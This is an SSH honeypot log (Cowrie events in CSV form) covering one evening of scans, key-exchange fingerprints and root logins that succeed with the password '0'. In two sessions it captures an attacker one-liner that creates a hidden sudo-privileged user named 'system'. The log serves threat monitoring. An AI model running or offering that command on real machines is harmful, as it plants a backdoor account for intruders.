openssh.com"",""chacha20-poly1305@openssh.com"",""aes128-ctr"",""aes192-ctr"",""aes256-ctr""],""macCS"":[""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-256"",""hmac-sha1"",""hmac-sha1-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:18:28.297675Z"",""src_ip"":""45.79.181.104"",""session"":""36f4dcfabbcb""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:18:28.311 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.021878719329833984,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:18:28.310421Z"",""src_ip"":""45.79.181.104"",""session"":""36f4dcfabbcb""} 
+",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:18:28.319 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""45.79.181.104"",""src_port"":34906,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""e42ac17da468"",""protocol"":""ssh"",""message"":""New connection: 45.79.181.104:34906 (10.0.0.4:2222) [session: e42ac17da468]"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:18:28.318670Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:18:28.320 PM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-Go"",""message"":""Remote SSH version: SSH-2.0-Go"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:18:28.320151Z"",""src_ip"":""45.79.181.104"",""session"":""e42ac17da468""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:18:28.330 
PM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""4e066189c3bbeec38c99b1855113733a"",""hasshAlgorithms"":""curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none"",""kexAlgs"":[""curve25519-sha256"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha256"",""diffie-hellman-group14-sha1"",""ext-info-c""],""keyAlgs"":[""ssh-ed25519-cert-v01@openssh.com"",""ssh-ed25519""],""encCS"":[""aes128-gcm@openssh.com"",""chacha20-poly1305@openssh.com"",""aes128-ctr"",""aes192-ctr"",""aes256-ctr""],""macCS"":[""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-256"",""hmac-sha1"",""hmac-sha1-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:18:28.328926Z"",""src_ip"":""45.79.181.104"",""session"":""e42ac17da468""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:18:28.345 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.024108409881591797,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:18:28.344269Z"",""src_ip"":""45.79.181.104"",""session"":""e42ac17da468""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:52:50.532 
PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""183.81.169.238"",""src_port"":34336,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""5a4a09281265"",""protocol"":""ssh"",""message"":""New connection: 183.81.169.238:34336 (10.0.0.4:2222) [session: 5a4a09281265]"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:52:50.531779Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:52:50.870 PM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-Go"",""message"":""Remote SSH version: SSH-2.0-Go"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:52:50.870019Z"",""src_ip"":""183.81.169.238"",""session"":""5a4a09281265""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:52:50.873 
PM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""4e066189c3bbeec38c99b1855113733a"",""hasshAlgorithms"":""curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none"",""kexAlgs"":[""curve25519-sha256"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha256"",""diffie-hellman-group14-sha1"",""ext-info-c""],""keyAlgs"":[""rsa-sha2-512-cert-v01@openssh.com"",""rsa-sha2-256-cert-v01@openssh.com"",""ssh-rsa-cert-v01@openssh.com"",""ssh-dss-cert-v01@openssh.com"",""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ssh-ed25519-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""rsa-sha2-512"",""rsa-sha2-256"",""ssh-rsa"",""ssh-dss"",""ssh-ed25519""],""encCS"":[""aes128-gcm@openssh.com"",""chacha20-poly1305@openssh.com"",""aes128-ctr"",""aes192-ctr"",""aes256-ctr""],""macCS"":[""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-256"",""hmac-sha1"",""hmac-sha1-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:52:50.871273Z"",""src_ip"":""183.81.169.238"",""session"":""5a4a09281265""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:52:52.879 PM",,"{""eventid"":""cowrie.login.success"",""username"":""root"",""password"":""0"",""message"":""login attempt [root/0] 
succeeded"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:52:52.878315Z"",""src_ip"":""183.81.169.238"",""session"":""5a4a09281265""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:52:53.657 PM",,"{""eventid"":""cowrie.session.params"",""arch"":""linux-x64-lsb"",""message"":[],""sensor"":""server01"",""timestamp"":""2024-09-20T19:52:53.655392Z"",""src_ip"":""183.81.169.238"",""session"":""5a4a09281265""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:52:53.657 PM",,"{""eventid"":""cowrie.command.input"",""input"":""apt update && apt install sudo curl -y && sudo useradd -m -p $(openssl passwd -1 NySjR8WR) system && sudo usermod -aG sudo system"",""message"":""CMD: apt update && apt install sudo curl -y && sudo useradd -m -p $(openssl passwd -1 NySjR8WR) system && sudo usermod -aG sudo system"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:52:53.656569Z"",""src_ip"":""183.81.169.238"",""session"":""5a4a09281265""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:52:53.658 PM",,"{""eventid"":""cowrie.command.input"",""input"":""openssl passwd -1 NySjR8WR"",""message"":""CMD: openssl passwd -1 NySjR8WR"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:52:53.657647Z"",""src_ip"":""183.81.169.238"",""session"":""5a4a09281265""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:52:53.659 
PM",,"{""eventid"":""cowrie.command.failed"",""input"":""openssl passwd -1 NySjR8WR"",""message"":""Command not found: openssl passwd -1 NySjR8WR"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:52:53.659012Z"",""src_ip"":""183.81.169.238"",""session"":""5a4a09281265""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:52:53.662 PM",,"{""eventid"":""cowrie.command.failed"",""input"":""apt update"",""message"":""Command not found: apt update"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:52:53.661295Z"",""src_ip"":""183.81.169.238"",""session"":""5a4a09281265""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:52:53.663 PM",,"{""eventid"":""cowrie.command.failed"",""input"":""apt install sudo curl -y"",""message"":""Command not found: apt install sudo curl -y"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:52:53.662771Z"",""src_ip"":""183.81.169.238"",""session"":""5a4a09281265""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:52:54.384 PM",,"{""eventid"":""cowrie.log.closed"",""ttylog"":""var/lib/cowrie/tty/d09f1be4445e8c75b43018bd26e56f49beb887367024614e8cd836eafa831894"",""size"":725,""shasum"":""d09f1be4445e8c75b43018bd26e56f49beb887367024614e8cd836eafa831894"",""duplicate"":false,""duration"":0.7269351482391357,""message"":""Closing TTY Log: var/lib/cowrie/tty/d09f1be4445e8c75b43018bd26e56f49beb887367024614e8cd836eafa831894 after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:52:54.382066Z"",""src_ip"":""183.81.169.238"",""session"":""5a4a09281265""} 
+",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:52:54.385 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":3.851876974105835,""message"":""Connection lost after 3 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:52:54.385011Z"",""src_ip"":""183.81.169.238"",""session"":""5a4a09281265""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 9:30:41.696 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""167.172.151.86"",""src_port"":58380,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""960d95d8a6d2"",""protocol"":""ssh"",""message"":""New connection: 167.172.151.86:58380 (10.0.0.4:2222) [session: 960d95d8a6d2]"",""sensor"":""server01"",""timestamp"":""2024-09-20T21:30:41.695090Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 9:30:41.706 PM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-libssh-0.1"",""message"":""Remote SSH version: SSH-2.0-libssh-0.1"",""sensor"":""server01"",""timestamp"":""2024-09-20T21:30:41.705383Z"",""src_ip"":""167.172.151.86"",""session"":""960d95d8a6d2""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 9:30:41.716 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.01883530616760254,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T21:30:41.715441Z"",""src_ip"":""167.172.151.86"",""session"":""960d95d8a6d2""} 
+",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 9:39:52.579 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""183.81.169.238"",""src_port"":51282,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""54b8d50b91cb"",""protocol"":""ssh"",""message"":""New connection: 183.81.169.238:51282 (10.0.0.4:2222) [session: 54b8d50b91cb]"",""sensor"":""server01"",""timestamp"":""2024-09-20T21:39:52.578328Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 9:39:52.652 PM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-Go"",""message"":""Remote SSH version: SSH-2.0-Go"",""sensor"":""server01"",""timestamp"":""2024-09-20T21:39:52.651834Z"",""src_ip"":""183.81.169.238"",""session"":""54b8d50b91cb""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 9:39:52.698 
PM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""4e066189c3bbeec38c99b1855113733a"",""hasshAlgorithms"":""curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none"",""kexAlgs"":[""curve25519-sha256"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha256"",""diffie-hellman-group14-sha1"",""ext-info-c""],""keyAlgs"":[""rsa-sha2-512-cert-v01@openssh.com"",""rsa-sha2-256-cert-v01@openssh.com"",""ssh-rsa-cert-v01@openssh.com"",""ssh-dss-cert-v01@openssh.com"",""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ssh-ed25519-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""rsa-sha2-512"",""rsa-sha2-256"",""ssh-rsa"",""ssh-dss"",""ssh-ed25519""],""encCS"":[""aes128-gcm@openssh.com"",""chacha20-poly1305@openssh.com"",""aes128-ctr"",""aes192-ctr"",""aes256-ctr""],""macCS"":[""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-256"",""hmac-sha1"",""hmac-sha1-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a"",""sensor"":""server01"",""timestamp"":""2024-09-20T21:39:52.696363Z"",""src_ip"":""183.81.169.238"",""session"":""54b8d50b91cb""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 9:39:53.090 PM",,"{""eventid"":""cowrie.login.success"",""username"":""root"",""password"":""0"",""message"":""login attempt [root/0] 
succeeded"",""sensor"":""server01"",""timestamp"":""2024-09-20T21:39:53.089621Z"",""src_ip"":""183.81.169.238"",""session"":""54b8d50b91cb""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 9:39:53.356 PM",,"{""eventid"":""cowrie.session.params"",""arch"":""linux-x64-lsb"",""message"":[],""sensor"":""server01"",""timestamp"":""2024-09-20T21:39:53.355158Z"",""src_ip"":""183.81.169.238"",""session"":""54b8d50b91cb""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 9:39:53.357 PM",,"{""eventid"":""cowrie.command.input"",""input"":""apt update && apt install sudo curl -y && sudo useradd -m -p $(openssl passwd -1 w8KjwZAx) system && sudo usermod -aG sudo system"",""message"":""CMD: apt update && apt install sudo curl -y && sudo useradd -m -p $(openssl passwd -1 w8KjwZAx) system && sudo usermod -aG sudo system"",""sensor"":""server01"",""timestamp"":""2024-09-20T21:39:53.356500Z"",""src_ip"":""183.81.169.238"",""session"":""54b8d50b91cb""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 9:39:53.358 PM",,"{""eventid"":""cowrie.command.input"",""input"":""openssl passwd -1 w8KjwZAx"",""message"":""CMD: openssl passwd -1 w8KjwZAx"",""sensor"":""server01"",""timestamp"":""2024-09-20T21:39:53.357695Z"",""src_ip"":""183.81.169.238"",""session"":""54b8d50b91cb""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 9:39:53.359 
PM",,"{""eventid"":""cowrie.command.failed"",""input"":""openssl passwd -1 w8KjwZAx"",""message"":""Command not found: openssl passwd -1 w8KjwZAx"",""sensor"":""server01"",""timestamp"":""2024-09-20T21:39:53.359177Z"",""src_ip"":""183.81.169.238"",""session"":""54b8d50b91cb""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 9:39:53.362 PM",,"{""eventid"":""cowrie.command.failed"",""input"":""apt update"",""message"":""Command not found: apt update"",""sensor"":""server01"",""timestamp"":""2024-09-20T21:39:53.361500Z"",""src_ip"":""183.81.169.238"",""session"":""54b8d50b91cb""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 9:39:53.363 PM",,"{""eventid"":""cowrie.command.failed"",""input"":""apt install sudo curl -y"",""message"":""Command not found: apt install sudo curl -y"",""sensor"":""server01"",""timestamp"":""2024-09-20T21:39:53.363209Z"",""src_ip"":""183.81.169.238"",""session"":""54b8d50b91cb""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 9:39:53.450 PM",,"{""eventid"":""cowrie.log.closed"",""ttylog"":""var/lib/cowrie/tty/2496cf54ff2ec11e9352e1664f905ee3e27899d682046033a59ad423e8e1fa81"",""size"":725,""shasum"":""2496cf54ff2ec11e9352e1664f905ee3e27899d682046033a59ad423e8e1fa81"",""duplicate"":false,""duration"":0.09480786323547363,""message"":""Closing TTY Log: var/lib/cowrie/tty/2496cf54ff2ec11e9352e1664f905ee3e27899d682046033a59ad423e8e1fa81 after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T21:39:53.449580Z"",""src_ip"":""183.81.169.238"",""session"":""54b8d50b91cb""} 
+",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 9:39:53.454 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.8723883628845215,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T21:39:53.452134Z"",""src_ip"":""183.81.169.238"",""session"":""54b8d50b91cb""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 10:00:10.915 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":120.08077883720398,""message"":""Connection lost after 120 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T22:00:10.914662Z"",""src_ip"":""42.240.129.244"",""session"":""0d826c74bc43""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 10:41:16.840 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""205.210.31.91"",""src_port"":60270,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""1730f346a603"",""protocol"":""ssh"",""message"":""New connection: 205.210.31.91:60270 (10.0.0.4:2222) [session: 1730f346a603]"",""sensor"":""server01"",""timestamp"":""2024-09-20T22:41:16.837358Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 10:41:17.556 PM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-ZGrab ZGrab SSH Survey"",""message"":""Remote SSH version: SSH-2.0-ZGrab ZGrab SSH 
Survey"",""sensor"":""server01"",""timestamp"":""2024-09-20T22:41:17.555184Z"",""src_ip"":""205.210.31.91"",""session"":""1730f346a603""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 10:41:18.458 PM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""dd9bcf093c355da7000132131cb36fd0"",""hasshAlgorithms"":""diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se;hmac-md5-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-ripemd160-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,hmac-md5,hmac-sha1,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96;none,zlib@openssh.com,zlib"",""kexAlgs"":[""diffie-hellman-group-exchange-sha256"",""diffie-hellman-group-exchange-sha1"",""diffie-hellman-group14-sha1"",""diffie-hellman-group1-sha1""],""keyAlgs"":[""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""ssh-ed25519-cert-v01@openssh.com"",""ssh-rsa-cert-v01@openssh.com"",""ssh-dss-cert-v01@openssh.com"",""ssh-rsa-cert-v00@openssh.com"",""ssh-dss-cert-v00@openssh.com"",""ssh-ed25519"",""ssh-rsa"",""ssh-dss""],""encCS"":[""aes128-ctr"",""aes192-ctr"",""aes256-ctr"",""arcfour256"",""arcfour128"",""aes128-gcm@openssh.com"",""aes256-gcm@openssh.com"",""chacha20-pol
y1305@openssh.com"",""aes128-cbc"",""3des-cbc"",""blowfish-cbc"",""cast128-cbc"",""aes192-cbc"",""aes256-cbc"",""arcfour"",""rijndael-cbc@lysator.liu.se""],""macCS"":[""hmac-md5-etm@openssh.com"",""hmac-sha1-etm@openssh.com"",""umac-64-etm@openssh.com"",""umac-128-etm@openssh.com"",""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-512-etm@openssh.com"",""hmac-ripemd160-etm@openssh.com"",""hmac-sha1-96-etm@openssh.com"",""hmac-md5-96-etm@openssh.com"",""hmac-md5"",""hmac-sha1"",""umac-64@openssh.com"",""umac-128@openssh.com"",""hmac-sha2-256"",""hmac-sha2-512"",""hmac-ripemd160"",""hmac-ripemd160@openssh.com"",""hmac-sha1-96"",""hmac-md5-96""],""compCS"":[""none"",""zlib@openssh.com"",""zlib""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: dd9bcf093c355da7000132131cb36fd0"",""sensor"":""server01"",""timestamp"":""2024-09-20T22:41:18.455639Z"",""src_ip"":""205.210.31.91"",""session"":""1730f346a603""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 10:41:21.155 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":4.313709497451782,""message"":""Connection lost after 4 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T22:41:21.154905Z"",""src_ip"":""205.210.31.91"",""session"":""1730f346a603""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:06:30.287 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""194.169.175.106"",""src_port"":55220,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""b6ffce5f261f"",""protocol"":""ssh"",""message"":""New connection: 194.169.175.106:55220 (10.0.0.4:2222) [session: b6ffce5f261f]"",""sensor"":""server01"",""timestamp"":""2024-09-20T23:06:30.285836Z""} 
